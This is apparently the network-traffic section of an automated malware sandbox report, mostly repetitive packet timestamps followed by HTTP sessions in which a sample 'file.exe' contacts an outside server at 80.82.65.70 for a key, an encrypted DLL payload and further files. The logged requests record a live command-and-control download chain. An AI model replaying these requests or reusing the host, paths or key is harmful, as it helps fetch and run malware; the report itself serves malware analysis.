                                          Dec 13, 2024 06:12:59.617294073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.617368937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.617403984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.617455959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.618154049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.618211985 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.618279934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.618331909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.619035006 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.619158983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.619174957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.619209051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.619920015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620012999 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.620014906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620064020 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.620773077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620824099 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.620870113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620914936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.621638060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.621690035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.621732950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.621790886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.622508049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.622612000 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.622659922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.623415947 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.623500109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.623514891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.623563051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.624253035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.624304056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.624320030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.624366999 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.650651932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.650854111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.650871992 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.650991917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651050091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651067019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651104927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651137114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651861906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651923895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651941061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651988983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.652729988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.652786016 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.652833939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.652962923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.653618097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.653731108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.950885057 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.950939894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.950944901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.951070070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.997944117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998009920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998020887 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.998065948 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.998344898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998404980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.998565912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998615026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.999218941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.999269009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.999361992 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.999412060 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.000137091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.000190973 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.000260115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.000307083 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.001089096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.001142979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.001193047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.001238108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.001828909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.001878023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.002064943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.002720118 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.002774000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.002820015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.002903938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.003655910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.003705025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.003712893 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.003756046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.004470110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.004528046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.004645109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.004693031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.005331039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.005367994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.005382061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.005417109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.006305933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.006340027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.006356955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.006385088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.007221937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.007258892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.007272005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.007303953 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.007936001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.008008003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.008156061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.008205891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.008769035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.008837938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.034531116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034585953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034674883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.034755945 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034837961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034902096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.035610914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.035681963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.035732985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.035897970 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.036504030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.036564112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.036643982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.036705971 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.037393093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.037466049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.037514925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.037578106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.038274050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.038337946 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.038393021 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.038451910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.039170027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.039284945 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.039370060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.039433002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.040698051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.040966034 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.041029930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.041857958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042057037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042119026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.042798996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042857885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042864084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.042913914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.043277025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.043349028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077337027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077406883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077440023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077496052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077788115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077841043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077847004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077887058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.078608036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.078675985 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.078742027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.078933954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.079473972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.079535007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.120769024 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.120800972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.120841980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.120841980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.120944023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121066093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121125937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.121830940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121882915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121946096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.122642994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.122704029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.122757912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.122812986 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.123537064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.123594046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.123615980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.123732090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.124393940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.124459028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.124506950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.124556065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.125459909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.125521898 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.125545979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.125597000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.126177073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.126296043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.126352072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.127113104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.127182961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.127228975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.127279997 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.127890110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128142118 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128201008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.128782988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128880024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.128884077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128950119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.129669905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.129730940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.129760027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.129869938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.130510092 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.130584955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.130628109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.130680084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.131371975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.131503105 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.131530046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.131586075 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.132253885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.132317066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.132319927 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.132375956 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.133102894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.133162022 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.133232117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.133285046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.134013891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.134077072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.134099960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.134159088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.134852886 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.134984970 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.135040998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.135708094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.135790110 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.135842085 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.135905981 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.136614084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.136667013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.136725903 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.136873960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.137481928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.137533903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.137603998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.137661934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.138365030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.138426065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.138461113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.138540030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.139200926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.139341116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.139344931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.139448881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.140089035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.140146017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.140193939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.140325069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.140968084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.141025066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.141057014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.141108036 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142024040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142110109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142132044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142231941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142699957 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142755032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142755032 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142807007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.189861059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.189938068 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.190002918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.190074921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.190253019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.190376043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.190432072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.191113949 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.191220045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.191262007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.191329956 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.192023039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.192080021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.192127943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.192179918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.192897081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.192950010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.193032980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.193082094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.193762064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.193835974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.193865061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.193948030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.194618940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.194679976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.194749117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.195353031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.195522070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.195585966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.195705891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.195771933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.196377993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.196443081 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.196512938 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.196584940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.197212934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.197288036 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.197345018 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.197410107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.198092937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.198220968 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.198286057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.198286057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.198968887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.199026108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.199095964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.199172020 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.199857950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.199915886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.199976921 CET804978680.82.65.70192.168.2.5
                                          • 80.82.65.70
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.5 | 49716 | 80.82.65.70 | 80 | 4308 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 06:12:22.608180046 CET | 412 | OUT | GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:23.975517035 CET | 204 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:23 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:24.157538891 CET | 386 | OUT | GET /dll/key HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:24.634342909 CET | 224 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:24 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 21
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                          Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                          Dec 13, 2024 06:12:24.645905972 CET | 391 | OUT | GET /dll/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:25.202938080 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:24 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                          Content-Length: 97296
                                          Keep-Alive: timeout=5, max=98
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Dec 13, 2024 06:12:25.705229998 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
